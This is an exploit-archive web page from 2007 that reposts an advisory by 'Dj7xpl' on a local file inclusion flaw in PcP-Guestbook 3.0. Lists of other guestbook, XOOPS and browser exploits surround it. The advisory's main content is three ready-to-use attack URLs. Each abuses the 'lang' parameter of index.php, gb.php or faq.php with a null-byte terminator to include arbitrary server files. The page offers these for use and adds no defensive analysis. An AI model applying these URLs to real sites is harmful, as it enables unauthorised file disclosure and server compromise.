exploits , vulnerabilities , articles , PcP-Guestbook 3.0 (lang) Local File Inclusion Vulnerabilities

2007-04-15 LS simple guestbook (v1) Remote Code Execution Vulnerability
2007-03-15 Creative Guestbook 1.0 Multiple Remote Vulnerabilities
2006-06-08 Guestex Guestbook 1.00 (email) Remote Code Execution Exploit
2006-05-31 Chipmunk Guestbook SQL Injection Vulnerabilities
2006-04-28 Advanced GuestBook <= 2.4.0 (phpBB) Remote File Inclusion Exploit

2007-04-09

PcP-Guestbook 3.0 (lang) Local File Inclusion Vulnerabilities

Rated as : Moderate Risk

                                                         
.-""""""""-.                       
         
                                                         /   Dj7xpl   \   
                          
                                                        |              |  
                             
                                                        |,  .-.  .-.  ,|  
                             
                                                        | )(_o/  \o_)( |  
                                  
                                                        |/     /\     \|  
                              
                                              (@_       (_     ^^     _)  
               
                                         _     )
\_______\__|IIIIII|__/_______________________________
                                       
(_)@8@8{}<________|-\IIIIII/-|________________________________>
                                               )_/        \          / 
                                               (@
											   
+_______________________________________________Iranian Are The Best In
World___________________________________________+
*
*
*       [~] Portal.......:    PcP-Book 3.0
*	[~] Site.........:    http://www.pcp-system.at
*       [~] Down.........:   
http://www.ectona.org/download/?id=621&s=info
*	[~] Author.......:    Dj7xpl  | Dj7xpl@yahoo.com
*
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
*
*
*
*       [~] Vuln.........:        
http://[Target]/[Path]/index.php?lang=[File-To-Require]%00
*                                 
http://[Target]/[Path]/gb.php?lang=[File-To-Require]%00
*                                 
http://[Target]/[Path]/faq.php?lang=[File-To-Require]%00
*                             
*		
+_______________________________________________________________________________________________________________________+


securitydot.net - 2007-04-09

Exploits - newest 10 RSS | More

2007-06-15 56186 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33454 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41608 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28806 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19332 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16353 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 18990 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16230 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33060 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16868 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit